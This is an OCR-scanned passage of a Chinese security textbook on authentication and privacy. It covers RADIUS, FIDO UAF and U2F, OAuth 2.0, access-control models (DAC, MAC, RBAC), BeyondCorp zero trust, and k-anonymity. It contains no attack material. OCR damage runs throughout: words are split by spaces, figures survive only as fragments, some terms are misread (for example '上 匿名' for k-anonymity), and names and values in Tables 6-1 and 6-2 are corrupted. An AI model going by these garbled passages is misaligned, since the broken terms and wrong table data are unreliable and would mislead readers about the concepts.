(9 RADIUS 返回 Accept, Reject 或 者 Challenge。 

@ RADIUS 客户 端 按照 Accept, Reject 附带 的 业务 和 业务 参数 执行 相应 的 操作 。 


点 对 点 协议 RADIUS 协议 用 户 数据 库 
| 
用 户 拨号 连接 网 络 访问 服务 器 NAS (IAS) 
(NAS) 服务 器 


图 6-12 微软 RADIUS 协议 的 工作 流程 


RADIUS 服务 器 可 以 支持 一 系列 可 变 的 方法 来 认证 用 户 。 当 用 户 提 供用 户 名 和 原 
始 的 口令 , 它 可 以 支持 PPP、PAP 或 CHAP、UNIX 登录 或 其 他 认证 机 制 。 

在 RADIUS 中 ,认证 和 授权 是 绑 在 一 起 的 。 如 果 用 户 名 在 数据 库 中 且 口 令 是 正确 
的 ,RADIUS 服务 器 会 返回 Access-Accept, 包 括 一 系列 属性 - 值 列表 对 ,描述 会 话 的 参数 。 
典型 的 参数 包括 服务 类 型 (Shell 或 者 帧 ) ,协议 类 型 .分 配给 用 户 的 TP 地 址 (静态 或 动 
250 ,访问 控制 列表 或 者 一 个 静态 路 由 。 

RADIUS 在 许多 企业 信息 系统 接 人 过 程 中 得 到 应 用 。 


2. 在 线 快速 身份 认证 (Fast Identity Online, FIDO) 

(D 简介 

据 统 计 ,80% 数 据 泄露 的 根源 是 使 用 不 安全 的 口令 认证 ,因为 每 个 用 户 有 90 个 账号 ， 
其 中 51% 的 口令 是 重复 使 用 的 。FIDO 联盟 意图 解决 在 线 认证 中 基于 口令 认证 难题 , 提 
供 更 简单 .更 安全 的 在 线 认 证 方案 。 

2009 年 ,时 任 Validity Sensors 公司 CEO 的 Ramesh Kesanupalli 与 PayPal 的 首席 
信息 安全 官 (CISO) Michael Barrett 共同 探讨 PayPal.com 如 何 使 用 生物 特征 识别 技术 
代替 口令 对 在 线 用 户 进 行 身份 认证 。 其 主要 思想 是 基于 生物 特征 识别 解锁 设备 上 的 加 密 
密 钥 , 使 用 公 钥 密码 或 者 对 称 密码 方案 与 服务 器 进行 身份 认证 ,从 而 可 完全 通过 本 地 身份 
认证 实现 无 口令 的 登录 。 

FIDO 联盟 由 PayPal、 联 想 集 团 Nok Nok Labs, Validity Sensors, Infineon 和 
Agnitio 于 2012 年 夏天 创立 ,主旨 是 制定 无 口令 身份 认证 协议 。 

2013 年 4 月 ,联盟 扩充 接受 了 由 Google、Yubico 和 NXP 于 2011 年 就 开始 研发 的 开 
放 式 第 二 因子 身份 认证 协议 。 该 协议 原理 与 FIDO 生物 识别 解决 方案 基本 相同 ,利用 形 
如 USB Key 等 的 第 二 因子 设备 与 服务 器 进行 认证 ,认证 过 程 中 用 户 通过 按 下 某 个 按钮 的 
手势 或 者 输入 短 的 口令 解锁 存储 在 第 二 因子 设备 中 的 密 钥 。 

这 两 种 认证 方式 的 特点 是 在 服务 器 端 都 没有 口令 存储 。 采 用 的 第 二 因子 设备 可 以 称 
为 认证 设备 ,针对 不 同 服务 注册 并 存储 不 同 的 密 钥 ,避免 了 在 不 同 服务 间 共 享用 户 的 隐 
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私 , 这 就 允许 用 户 采 用 多 个 匿名 的 安全 身份 。 此 概念 构成 所 有 FIDO 标准 的 基础 。 

2014 年 12 月 9 日 ,完整 的 1.0 版 无 口令 协议 ( 称 为 通用 身份 认证 框架 一 UAF) 和 第 
二 因子 协议 ( 称 为 通用 第 二 因子 一 U2F) 同 时 发 布 。2016 年 2 月 ,万 维 网 联盟 (W3C) 基 于 
联盟 提交 的 FIDO2.0 Web API 启动 了 网 络 身份 认证 领域 的 全 新 标准 制定 工作 ,其 目标 是 
对 所 有 网 络 浏览 器 和 相关 网 络 平台 基础 设施 中 采用 的 强身 份 认 证 进行 标准 化 。 截 止 到 
2016 年 末 ,FIDO 联盟 已 成 为 可 提供 200 多 种 认证 解决 方案 .可 互 操作 的 身份 认证 生态 

(2) 通用 身份 认证 框架 (Universal Authentication Framework,UAF) 

UAF 无 口令 认证 的 体验 如 图 6-13 所 示 , Alice 要 通过 手机 转账 10000 元 ,APP ok 
进行 在 线 认证 。Alice 只 须 在 手机 终端 上 输入 指纹 (也 可 以 根据 系统 要 求 进行 人 脸 识别 )， 


终端 完成 认证 。 


在 线 认 证 请 求 本 地 设备 认证 
交易 详情 生物 特征 识别 完成 


图 6-13 UAF 无 口令 认证 


实际 上 ,FIDO UAF 的 架构 如 图 6-14 所 示 , 包 括 FIDO 用 户 设备 和 依赖 方 。 在 依赖 
方 包括 Web 服务 器 和 FIDO 服务 器 ,FIDO 服务 器 中 包含 存放 密码 认证 公 钥 的 数据 库 , 以 


TLS 协 议 |LTLS 协 议 依赖 方 
Web 服 务 器 


鉴别 密 钥 
参考 数据 库 FIDO 服 务 器 


鉴别 密 钥 


认证 器 元 数据 
及 认证 信息 存储 库 


6-14 FIDO UAF 架构 
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及 认证 器 的 元 数据 和 可 信 验 证 密 钥 ,这 个 密 钥 用 于 验证 认证 器 软件 的 可 信 性 。FIDO 用 
户 设备 这 段 包 括 浏览 器 或 者 APP、FIDO 客户 端 \FIDO 认证 器 ,ASM(Authenticator 
Specific Module) 是 连接 特定 认证 器 和 FIDO 客户 端的 调用 接口 ,用 于 使 FIDO 客户 端 可 
以 连接 多 个 FIDO 认证 器 。FIDO 认证 器 里 存储 了 多 个 私 钥 ,对 依赖 方 可 以 注册 使 用 不 
同 的 私 钥 。 

FIDO 的 注册 过 程 如 图 6-15 所 示 ,用 户 产生 新 的 密 钥 对 , 私 钥 存储 在 认证 器 中 ,对 应 
的 公 钥 传输 到 FIDO 服务 器 保存 。 


用 户 设备 依赖 方 


用 户 应 用 Web APP FIDO 服 务 器 
(Appstz 订 始 化 ide) 


浏览 器 ) 
注册 请 求 + 策略 


注册 响应 + 


设备 验证 信息 +| 
用 户 公 钥 


FIDO 认 


响应 与 验证 ， 


Q 用 户 注册 & 生 成 密 钥 对 存储 用 户 公 钥 


. 
? 


用 户 


图 6-15 FIDO 用 户 注册 流程 


认证 的 过 程 如 图 6-16 所 示 , 用 户 端 发 起 认证 后 ,服务 端 发 送 挑 战 给 FIDO 客户 端 ， 
FIDO 客户 端 通过 生物 特征 或 者 输入 短 的 PIN 码 验 证 用 户 并 解锁 私 钥 , 用 私 钥 对 挑战 进 
行 签名 并 返回 给 服务 器 ,完成 对 客户 端的 认证 。PIN 码 一 般 就 是 手机 的 开机 密码 或 者 手 

(3) 通用 第 二 因子 认证 协议 (Universal 2nd Factor. U2F) 

U2F 协议 使 在 线 业 务 在 其 已 有 的 口令 认证 基础 设施 之 上 增强 安全 性 。 其 用 户 体验 
如 图 6-17 所 示 ,用 户 像 以 前 一 样 使 用 用 户 名 和 口令 登录 系统 ,服务 端 会 在 其 流程 中 任何 
合适 的 时 候 提示 用 户 使 用 第 二 因子 设备 进行 认证 。 第 二 因子 强 认 证 设备 可 以 简化 口令 ， 
比如 使 用 4 位 PIN 码 , 而 仍然 保持 强 的 安全 性 。 

U2F 协议 的 核心 是 U2F 设备 具有 针对 特定 网 站 产生 不 同 公 私 钥 对 的 能 力 , 并 将 公 
钥 和 公 钥 的 索引 在 注册 阶段 发 送 给 原来 的 在 线 服务 网 站 。 当 用 户 执行 认证 时 ,在 线 服 务 
站 点 将 公 钥 索引 连同 挑战 通过 浏览 器 发 送 回 U2F 设备 ,U2F 设备 可 以 用 这 个 索引 选 定 
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用 户 设备 依赖 方 


用 户 应 用 Web APP FIDO 服 多 
[NE pe 


IOS, Android). 浏览 器 ) 认证 请 求 + 
挑战 值 + 策略 


使 用 用 户 私 钥 


签名 的 
认证 响应 


dig gp 
Q "novies pu 


图 6-16 FIDO UAF 认证 流程 


在 线 认 证 请 求 本 地 设备 认证 成 功 


登录 & 密 码 插入 FIDO 安 全 密 钥 
并 点 击 按钮 


图 6-17 FIDO U2F 认证 


对 应 私 钥 ,并 生成 挑战 的 数字 签名 发 送 给 在 线 服 务 ,可 以 验证 用 户 确实 持 有 U2F 设备 。 

在 注册 阶段 ,浏览 器 会 向 U2F 设备 发 送 在 线 网 站 主机 名 、 端 口 和 使 用 协议 等 信息 的 
Hash.U2F 要 将 Hash 值 编码 到 公 钥 索引 当中 。 在 认证 时 ,服务 器 将 公 钥 索引 发 回 给 浏 
览 器 的 时 候 , 浏 览 器 还 要 将 服务 器 相关 信息 的 Hash 和 公 钥 索引 发 给 U2F 设备 , U2F 设 
备 要 验证 Hash 和 公 钥 索引 中 原来 编码 的 Hash 是 否 匹配 .如果 不 匹配 就 不 返回 任何 签 
名 。 这 样 做 的 目的 是 迫使 不 同 的 在 线 服 务 使 用 不 同 的 公 钥 ,从 而 避免 不 同 的 网 站 合谋 使 
用 相同 的 公 钥 ,并 对 用 户 的 行为 进行 画像 和 追踪 ,以 保护 用 户 的 身份 隐私 。 
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3. 联盟 身份 管理 (Federated Identity Management , FIM) 
FIM 可 以 使 用 户 使 用 同一 个 身份 在 组 成 联盟 的 所 有 企业 中 访问 相应 的 资源 。 这 类 
系统 也 被 称 为 身份 联盟 ,其 支持 用 户 身份 跨 安 全 域 链接 ,每 个 域 拥有 自己 的 身份 管理 系 
统 。 如 果 两 个 域 组 成 联盟 ,那么 用 户 在 一 个 域 中 认证 之 后 .不 需要 再 进行 独立 的 登录 过 程 
就 可 以 访问 另 一 个 域 的 资源 。 
单 点 登录 Single sign-on (SSO) 是 身份 联盟 的 一 个 重要 组 件 , 但 其 与 身份 联盟 不 是 一 
回 事 情 。SSO 通常 使 用 户 可 以 使 用 同一 组 身份 证 明 访 问 一 个 组 织 中 的 多 个 系统 ,而 身份 
联盟 使 用 户 跨 组 织 访问 系统 ,因此 身份 联盟 系统 包含 SSO。 身 份 联盟 在 浏览 器 层面 和 
SOA 层面 都 涉及 大 量 用 户 一 用 户 、 用 户 一 应 用 、 应 用 一 应 用 的 应 用 场景 。 
要 使 FIM 发 挥 效用 ,联盟 成 员 之 间 必 须要 建立 互信 。 授 权 信息 可 以 在 联盟 成 员 间 通 
过 安全 信道 传递 。OAuth 是 典型 的 FIM 系统 。 
OAuth 是 Open Authorization 的 简写 。 传 统 的 客户 端 -服务 器 认证 模型 中 ,用 户 在 访 
问 受 限 的 资源 时 ,需要 用 资源 所 有 者 发 布 的 身份 证 明 向 服务 器 认证 身份 。 如 果 要 向 第 三 
方 应 用 提供 受 限制 资源 的 访问 ,资源 所 有 者 必须 和 第 三 方 共享 其 身份 证 明 , 这 会 带 来 一 
问题 。 
。 第 三 方 应 用 需要 存储 资源 所 有 者 的 身份 证 明 , 比 较 典 型 的 是 口令 的 明文 。 
。 服务 器 要 支持 口令 认证 ,即使 我 们 已 经 知道 口令 存在 内 在 的 脆弱 性 。 
。 第 三 方 应 用 获得 了 过 多 的 受 保护 资源 的 访问 权限 ,而 资源 所 有 者 没有 任何 能 力 限 
制 其 只 在 有 限 的 时 间 内 访问 部 分 资源 。 

* 资源 所 有 者 如 果 不 撤销 所 有 第 三 方 的 访问 就 不 能 撤销 单个 第 三 方 的 访问 ,而 且 必 
须 通过 修改 第 三 方 的 口令 来 实现 。 

OAuth 定义 了 4 个 角色 ,分 别 是 : 

。 资源 所 有 者 : 可 以 许可 访问 受 保护 的 资源 的 实体 。 如 果 资 源 所 有 者 是 人 ,其 指 的 
是 终端 用 户 。 

。 资源 服务 器 : 运行 受 保护 资源 的 服务 器 ,可 以 接受 和 响应 对 受 保护 资源 使 用 访问 
令 牌 的 访问 请 求 。 

。 客户 : 得 到 资源 所 有 者 授权 并 代表 其 产生 受 保护 资源 访问 请 求 的 应 用 。 
。 授权 服务 器 : 在 成 功 认 证 资源 所 有 者 并 获得 授权 后 向 客户 颁发 访问 令 牌 。 

OAuth 没有 规定 授权 服务 器 和 资源 服务 器 之 间 的 交互 过 程 。OAuth 2.0 的 工作 流 
程 如 图 6-18 所 示 。 

(A) 客户 向 资源 所 有 者 请 求 授权 .授权 请 求 可 以 直接 向 资源 所 有 者 提出 ,也 可 以 通 
过 授权 服务 器 间接 提出 。 

(B) 客户 收 到 授权 许可 ,具体 形式 可 以 参看 标准 定义 。 

(C) 客户 请 求 授 权 服 务 器 的 认证 ,向 授权 服务 器 出 示 授 权 许可 以 请 求 访问 令 牌 。 

(D) 授权 服务 器 认证 客户 ,并 且 验 证 授权 许可 的 有 效 性 ,颁发 访问 令 牌 。 

(E) 客户 向 资源 服务 器 出 示 访 问 令 牌 以 请 求 受 保护 的 资源 。 

CF). 资源 服务 器 验证 访问 令 牌 的 有 效 性 ,如 果 有 效 ,请 求 进行 服务 。 
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(A) 请 求 授权 
(B) 权限 授予 资源 拥有 者 
E (O BIBT 
LI (D) 访问 令 牌 认证 服务 器 
(b 访问 令 牌 
(P) 受 保护 的 资源 资源 服务 器 


6-18 OAuth 2.0 工作 流程 


任何 服务 提供 商都 可 以 实现 自身 的 OAUTH 认证 服务 ,因而 OAUTH 是 开放 的 。 
互联 网 很 多 服务 (如 Open APD ,很 多 大 的 公司 (如 Google: Yahoo: Microsoft 等 ) 都 提供 
了 OAUTH 认证 服务 。 一 个 典型 场景 是 : 如 果 一 个 用 户 需 要 两 项 服务 ,一 项 服务 是 图 片 
在 线 存储 服务 A, 另 一 个 是 图 片 在 线 打印 服务 B。 由 于 服务 A 与 服务 B 是 由 两 家 不 同 的 
服务 提供 商 提供 的 ,所 以 用 户 在 这 两 家 服务 提供 商 的 网 站 上 各 自 注册 了 一 个 用 户 ,假设 这 
两 个 用 户 名 各 不 相同 ,密码 也 各 不 相同 。 当 用 户 要 使 用 服务 B 打印 存储 在 服务 A 上 的 图 
片 时 ,用 户 该 如 何 处 理 ? 

方法 一 : 用 户 可 先 将 待 打 印 的 图 片 从 服务 A 下 载 并 上 传 到 服务 B 上 打印 ,这 种 方式 
安全 但 处 理 比较 烦琐 ,效率 低下 ; 

方法 二 : 用 户 将 在 服务 A 上 注册 的 用 户 名 与 密码 提供 给 服务 B, 服 务 B 使 用 用 户 的 
账号 再 去 服务 A 处 下 载 待 打印 的 图 片 , 这 种 方式 效率 是 提高 了 ,但 是 安全 性 大 大 降低 了 。 

使 用 OAuth 可 以 解决 这 个 问题 。 服 务 B 可 以 作为 客户 从 作为 资源 所 有 者 的 用 户 处 
获得 访问 服务 A 获取 图 片 的 授权 ,然后 服务 B 向 与 服务 A 联盟 的 授权 服务 器 认证 自己 的 
身份 ,认证 通过 后 授权 服务 器 向 服务 B 发 放 访 问 作为 资源 服务 器 A 的 访问 令 牌 。 服 务 B 
向 A 出 示 令 牌 ,A 验证 通过 后 将 图 片 交 给 B 打印 。 

这 一 过 程 中 ,授权 服务 器 作为 FIM 的 身份 管理 系统 ,可 以 支持 多 个 不 同 组 织 的 身份 
认证 服务 ,一 个 主流 的 身份 服务 标准 是 OpenID。 


6.2.4 ”访问 控制 模型 


1. 自主 访问 控制 和 强制 访问 控制 

20 世纪 70 年 代 至 90 年 代 , 研 究 人 员 针 对 共享 数据 的 访问 权限 管理 提出 了 自主 访问 
控制 模型 DAC 和 强制 访问 控制 模型 MAC。 在 DAC 模型 中 ,资源 拥有 者 按照 自己 的 意 
愿 来 决定 是 否 将 自己 所 拥有 资源 的 访问 权限 授予 其 他 用 户 ,可 以 有 选择 地 与 其 他 用 户 共 
享 其 资源 。 而 MAC 模型 中 ,资源 的 访问 权限 是 由 享有 标记 权限 的 信息 系统 安全 管理 员 
进行 分 配 。DAC 可 以 提供 较为 灵活 的 访问 控制 策略 ,但 是 安全 性 较 差 。MAC 通过 为 用 
户 和 数据 划分 安全 等 级 ,实现 了 信息 的 单 向 流动 ,但 由 于 MAC 采用 集中 式 管理 方式 , 当 
系统 用 户 数量 增加 时 会 给 系统 管理 员 带 来 极 大 的 授权 负担 ,同时 ,权限 管理 效率 偏 低 、 缺 
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2. 基于 角色 的 访问 控制 

20 世纪 90 年 代 至 2000 年 , 随 着 信息 系统 与 网 络 技术 的 发 展 ,DAC 与 MAC 的 有 限 
扩展 特性 已 无 法 满足 大 规模 系统 中 日 益 复杂 的 访问 需求 。 因 此 有 学 者 在 DAC 和 MAC 
的 基础 上 引入 角色 和 任务 等 概念 ,提出 了 基于 角色 的 访问 控制 RBAC 模型 。RBAC 中 通 
过 角色 对 访问 控制 策略 进行 描述 ,系统 中 的 用 户 和 权限 均 对 应 于 某 些 特定 的 角色 。 角 色 
的 引入 实现 了 用 户 与 权限 之 间 的 分 离 , 简 化 了 授权 管理 。 图 6-19 展示 了 用 户 角色 关系 
模型 。 


操作 _write 


6-19 ”用 户 角色 关系 模型 


RBAC 中 相关 的 概念 包括 : 
。 主体 : 指 可 以 主动 对 其 他 实体 进行 相关 操作 的 实体 。 一 般 情况 下 ,主体 指 的 是 系 
统 用 户 或 者 代理 用 户 行为 的 进程 。 
。 客体 : 被 动 接受 其 他 实体 动作 的 实体 ,通常 来 说 可 以 是 系统 的 软件 或 硬件 资源 。 
* 用户; 权限 控制 的 访问 人 员 , 即 系统 的 使 用 人 员 。 每 个 用 户 都 具有 唯一 的 标 
识 符 。 
。 角色 : 是 系统 中 一 系列 职责 的 集合 。 如 何 划 分 角色 需要 根据 具体 的 问题 来 分 析 ， 
安全 策略 也 需 被 考虑 其 中 。 
* BUR. 规定 了 针对 受 保护 客体 操作 的 行为 许可 。 客 体 可 执行 的 操作 与 系统 的 设 
计 有 关 。 
。 用 户 角色 分 配 : 指 通过 为 用 户 分 配角 色 来 建立 用 户 与 角色 的 对 应 关系 。 
。 角色 权限 分 配 : 指 通过 为 角色 分 配 权限 来 建立 角色 与 权限 的 对 应 关系 。 
。 会 话 : 指 用 户 与 系统 的 一 次 交互 ,用 户 与 会 话 之 间 是 一 对 多 的 关系 。 
在 实际 应 用 中 ,通常 存在 着 多 个 用 户 拥有 相同 的 权限 的 情况 。 在 分 配 的 时 候 需 要 分 
别 为 这 几 个 用 户 指定 相同 的 权限 ,修改 时 也 要 对 这 几 个 用 户 的 权限 进行 一 一 修改 。 通 过 
基于 角色 的 访问 控制 ,只 须 为 该 角色 制定 好 权限 ,然后 为 具有 相同 权限 的 用 户 指定 同一 个 
角色 即 可 。 当 需要 对 批量 用 户 权限 进行 调整 的 时 候 ,只 须 调整 与 用 户 相 关联 的 角色 权限 ， 
即 可 实现 所 有 用 户 权 限 的 调整 。 这 一 访问 控制 手段 简化 了 用 户 的 权限 管理 ,大 幅 提 升 了 
权限 调整 的 效率 ,降低 了 漏 调 权限 的 概率 ,减少 了 系统 的 开销 。 
上 面 的 访问 控制 模型 可 有 效 解决 单一 封闭 环境 下 的 访问 控制 问题 ,但 不 足以 应 对 证 
在 网 络 空间 新 的 信息 服务 模式 和 传播 方式 所 带 来 的 新 挑战 ,特别 是 数据 的 所 有 权 和 管理 
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BUY Bi ,信息 的 二 次 /多 次 转发 等 的 访问 控制 。 针 对 这 一 问题 ,中 科 院 信 工 所 李 凤 华 等 人 
提出 一 种 面向 网 络 空 间 的 访问 控制 模型 CoAC。 该 模型 涵盖 了 访问 请 求实 体 .广义 时 态 、 
接 和 点 ,访问 设备 .网络 ,资源 .网络 交互 图 和 资源 传播 链 等 要 素 , 可 有 效 防 止 由 于 数据 所 
有 权 与 管理 权 分 离 ,信息 二 次 /多 次 转发 等 带 来 的 安全 问题 。 


6.2.5 ” 零 信任 模型 


2010 4E, Forrester 分 析 师 John Kindervag 提出 了 “ 零 信任 模型 ”(Zero Trust 
Model) ,其 核心 思想 是 网 络 边界 内 外 的 任何 东西 , 在 未 验证 之 前 都 不 予以 信任 。 该 模型 
放弃 “边界 防护 ”的 思路 ,在 * 零 信任 ”的 发 展 过 程 中 ,国内 外 各 厂商 纷纷 提出 自己 的 解决 方 
案 , 其 中 比较 有 影响 的 是 谷歌 BeyondCorp 体系 ,具体 包括 以 下 特点 。 

(1) 内 网 应 用 程序 和 服务 不 再 对 公 网 可 见 

外 部 可 见 的 组 件 只 有 访问 代理 、. 单 点 登录 (SSO) 系 统 、 在 公司 内 部 的 RADIUS 组 件 ， 
以 及 间接 暴露 的 访问 控制 引擎 组 件 。 访 问 代 理 和 访问 控制 引擎 组 件 共同 组 成 前 端 访问 代 
理 (GFE) ,集中 对 访问 请 求 进行 认证 和 授权 。 

(2) 企业 内 网 的 边界 消失 

发 起 连接 的 设备 或 终端 所 在 网 络 位 置 和 IP 地 址 不 再 是 认证 授权 的 必要 因素 。 无 论 
设备 或 终端 在 哪里 ,所 有 对 企业 应 用 或 服务 的 访问 请 求 ,都 必须 经 过 一 个 逻辑 集中 访问 代 
理 组 件 的 认证 和 授权 。 

(3) 基于 身份 .设备 .环境 认证 的 精准 访问 控制 

只 有 公司 的 设备 清单 数据 库 组 件 中 的 受 控 设备 (公司 购买 并 管控 ,对 每 台 设 备 发 放 证 
书 ), 并 且 用 户 必须 在 用 户 / 群 组 数据 库 组 件 中 存在 ,才能 通过 认证 ,然后 经 过 信任 推断 组 
件 的 计算 后 , 才 会 获得 相应 的 授权 。 每 个 用 户 和 /或 设备 的 访问 级 别 可 能 随时 改变 。 通 过 
查询 多 个 数据 源 , 能 够 动态 推断 出 分 配给 设备 或 用 户 的 信任 等 级 。 

访问 代理 中 的 访问 控制 引擎 基于 每 个 访问 请 求 , 为 企业 应 用 提供 服务 级 的 细 粒 度 授 
权 。 授 权 基于 用 户 、 用 户 组 ,设备 证 书 、 设 备 清 单数 据 库 中 的 设备 属性 进行 综合 判定 。 地 
理 位 置 和 网 络 位 置 在 BeyondCorp 安全 模型 中 ,已 经 不 是 认证 授权 的 必 选 项 ,而 是 根据 需 
要 做 判定 的 一 个 可 选项 。 

(4) 提供 网 络 通信 的 端 到 端 加 密 

用 户 设备 到 访问 代理 之 间 经 过 TLS 加 密 ,访问 代理 和 后 端 企业 应 用 之 间 使 用 谷歌 内 
部 开发 的 认证 和 加 密 框 架 LOAS(Low Overhead Authentication System) 双 向 认证 和 加 
密 。 保 证 数据 链 路 的 机 密 性 和 完整 性 。 


63 隐私 保护 


6.3.1 ”隐私 的 定义 

隐私 的 概念 在 不 同 国家 .宗教 .文化 和 法 律 背 景 下 ,其 内 涵 有 很 大 差别 。OECD X 
私 的 定义 为 : “任何 与 已 知 个 人 或 可 识别 的 个 人 相关 的 信息 ”。 美国 注册 会 计 师 协会 
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(AICPA) 和 加 拿 大 特许 会 计 师 协会 (CICA) 在 公认 隐私 原则 (GAPP) 标准 中 定义 隐私 
为 “个 人 或 机 构 关于 收集 、 使 用 、 保 留 .披露 和 处 置 个 人 信息 的 权利 和 义务 ”。 

本 书 将 隐私 界定 为 : 隐私 是 指 个 体 的 敏感 信息 ,群体 或 组 织 的 敏感 信息 可 以 表示 为 
个 体 的 公共 人 敏感 信息 。 因 此 可 以 将 信息 分 为 公开 信息 、 秘 密 信 息 、 隐 私信 息 三 类 ;对 组 织 
而 言 ,信息 包括 公开 信息 和 秘密 信息 ,对 个 人 而 言 ,信息 包括 公开 信息 和 隐私 信息 。 

隐私 保护 采用 的 方法 主要 可 以 分 为 两 类 , 即 基于 数据 扰乱 的 方法 和 基于 密码 的 方法 。 

数据 扰乱 是 当前 最 常用 的 隐私 保护 技术 之 一 。 基 于 特定 策略 修改 真实 的 原始 数据 ， 
数据 扰乱 使 得 攻击 者 无 法 通过 发 布 后 的 数据 来 获取 真实 数据 信息 ,进而 实现 隐私 保护 。 
数据 扰乱 通常 包含 数据 泛 化 数据 扭曲 数据 清洗 .数据 屏蔽 等 。 数 据 泛 化 通常 指使 用 数 
值 型 或 枚 举 型 的 属性 值 来 替换 真实 数据 ,使 发 布 数据 中 所 含 信息 的 粒度 降低 ;数据 扭曲 主 
要 通过 将 随机 数值 与 原始 数据 进行 琶 加 来 修改 真实 数据 的 数值 以 实现 隐私 保护 ,三 加 方 
法 通常 采用 加 性 又 加 或 乘 性 释 加 。 数 据 清 洗 主 要 基于 隐藏 数 据 潜 在 关联 规则 的 原理 , 通 
过 修改 或 移 除 某 些 特定 的 数据 使 得 相应 的 频繁 项 集 的 支持 度 降低 。 数 据 屏 蔽 通常 利用 符 
号 来 代替 隐私 属性 值 ,采用 基于 概率 分 析 的 修正 方法 ,实现 隐私 保护 的 同时 能 提高 数据 分 
析 的 精度 。 


6.3.2 上 匿名 


k- 匿 名 (k-anonymity) 最 早 由 Sweeney 提出 。 个 人 信息 数据 库 被 共享 时 ,需要 采用 隐 
私 保 护 技 术 。 这 些 数据 库 的 每 一 条 记录 一 般 包 括 个 人 的 姓名 、 电 话 、 身 份 证 号 码 , 以 及 其 
他 属性 数据 。 在 许多 隐私 保护 系统 中 ,要 保护 的 是 与 数据 关联 的 个 人 的 身份 ,或 者 是 个 人 
的 某 些 敏 感 信息 。 通 过 仔细 观察 和 分 析 数 据 , 就 发 现 仅 在 数据 集中 去 掉 名 字 是 不 能 起 到 
匿名 效果 的 。 通 过 与 其 他 数据 集 的 关联 ,匿名 化 的 数据 可 以 重新 确定 身份 。 数 据 集中 存 
在 一 些 准 标识 符 , 当 与 其 他 数据 集中 的 信息 组 合 在 一 起 的 时 候 可 以 重新 标识 身份 。 例 如 ， 
大 概 87% 的 美国 人 可 以 仅 用 其 {5 位 邮政 编码 、 性 别 和 出 生年 月 } 的 组 合 唯 一 标识 出 来 。 
即时 只 有 一 小 部 分 人 被 唯一 标识 ,也 是 非常 严重 的 信息 泄露 。 

k- 匿 名 可 以 用 “大 隐隐 于 市 ”来 形容 : 如 果 每 个 个 体 的 特定 敏感 值 在 一 个 大 群体 中 都 
是 一 样 的 ,那么 在 这 个 大 的 群体 中 从 这 些 敏 感 值 就 区 分 不 出 特定 的 个 体 。 下面 给 出 
Sweeney 对 准 标识 符 的 定义 。 

定义 6-1( 准 标识 符 ) : 给 定 一 个 实体 的 总 体 U, 一 个 实体 特定 的 表 T CAL ALD. 
映射 f.:U 一 和 fs: TT 一 U', 其 中 ,USU。 
T 的 一 个 准 标识 符 QT 是 属性 集合 {A;,…,A,} 
C (Ai. AL) ,其 中 ,3piEU 使 得 f, Cf. (pi) 


[QT = pis 
i 例如 : V 是 一 个 投票 人 的 记录 ,V 的 一 个 准 标 
上 次 投票 日 识 符 QV 就 是 {姓名 、 地 址 、 邮 编 .生日 ,性别 }。 


如 图 6-20 所 示 , 将 投票 人 记录 表 和 医疗 数据 
链接 在 一 起 ,就 可 以 清楚 地 显现 { 生 日 .邮编 、 性 
别 })EQV。 此 外 ,因为 {姓名 ,地 址 } CQV 也 可 能 
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出 现在 其 他 外 部 信息 记录 中 并 且 可 以 用 于 链接 ,在 匿名 的 情形 下 .这些 通常 是 可 以 公开 获 
取 的 信息 ,而 我 们 禁止 这 些 信息 可 以 被 链接 ,因此 这 些 构成 准 标识 符 的 属性 同时 出 现在 私 
有 信息 和 公开 信息 中 就 应 该 严格 控制 。 

定义 6-2(k- 匿 名 ) : 令 RT(Ai,…,A,) 是 一 个 记录 表 ,QIRT 是 与 之 关联 的 准 标识 
fF. RT 被 称 为 满足 k- 匿 名 当 且 仅 当 RTLQIRT] 中 每 个 值 序列 在 RTLQIRT] 中 同时 出 


现 至 少 k 次 。 


例如 ,有 记录 表 如 表 6-1 所 示 。 


表 6-1 个 人 信息 记录 表 


姓 名 邮编 年 gm 性 别 疾 病 
张 晓 刚 710126 22 男 心血 管 
李 诗 阳 710071 23 男 肺炎 
王 凯 旋 710068 18 男 健康 
刘 婷 婷 100101 47 女 癌症 
rri 100108 42 女 健康 
fer ttá dfi 100093 56 女 心血 管 
WE 200433 23 9 肺炎 
X 200020 29 男 肝炎 
孙 景 丹 200240 18 女 癌症 


k 二 3 的 k- 匿 名 化 记录 表 如 表 6-2 所 示 。 去 除了 姓名 属性 ,对 邮编 和 性 别 属性 进行 了 
属性 泛 化 或 者 掩盖 。 在 这 个 例子 中 因为 数据 集 较 小 ,数据 失真 得 十 分 严重 。 数 据 集 越 大 ， 


达到 kk 匿名 的 失真 越 小 。 
表 6-2 上 ==3 匿名 化 的 个 人 信息 记录 表 
姓 名 邮 编 年 ” 龄 性 别 疾 8 
* 710* 22 9 心血 管 
* 710 * 23 男 肺炎 
* 710 * 18 E 健康 
* 100 * 47 女 癌症 
* 100* 42 女 健康 
* 100 * 56 * 心血 管 
* 200 * 23 * 肺炎 
* 200 * 29 * 肝炎 
* 200 * 18 * 癌症 


k- 匿 名 可 以 提供 一 些 有 用 的 隐私 保护 保障 ,必须 满足 以 下 条 件 : 
。 敏感 列 不 能 泄露 出 被 泛 化 列 的 信息 。 例 如 , 某 种 疾病 对 男性 或 者 女性 是 唯一 ,这 
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样 就 会 泄露 被 隐藏 的 性 别 属 性 。 

。 如 果 一 个 共享 准 标识 符 、 包 含 k 条 记录 集合 的 敏感 值 相同 ,这 个 数据 对 于 同 质 化 
攻击 (Homogeneity attack) 仍 然 是 脆弱 的 。 同 质 化 攻击 中 ,如 果 所 有 敏感 值 相同 ， 
攻击 者 一 旦 发 现 个 人 所 属 的 记录 组 ,就 可 以 推断 出 其 敏感 信息 。 例 如 , 若 数据 集 
中 所 有 大 于 60 岁 的 男性 都 患 有 癌症 ,攻击 者 知道 Bob 在 数据 集 里 且 大 于 60 岁 ， 
就 会 知道 Bob 患 有 癌症 。 更 进一步 的 是 ,即使 k 个 元 素 的 组 不 是 所 有 的 值 都 一 
样 ,如 果 没 有 足够 的 多 样 性 ,仍然 有 很 高 的 概率 知道 Bob 的 一 些 敏感 信息 。 因 此 
提出 了 上 多 样 性 和 t+- 接近 性 的 概念 ,以 要 求 在 匹配 的 k 个 记录 中 必须 在 敏感 值 属 
性 上 保持 足够 的 多 样 性 。 上 多样 性 要 求 发 布 数据 集中 的 每 个 等 价 类 至 少 包 括 1 个 
敏感 属性 值 的 “代表 ”。t- 接 近 性 则 要 求 敏感 属性 值 在 每 个 等 价 类 中 的 分 布 与 数 
据 集中 的 全 局 分 布 差异 不 超过 t。 

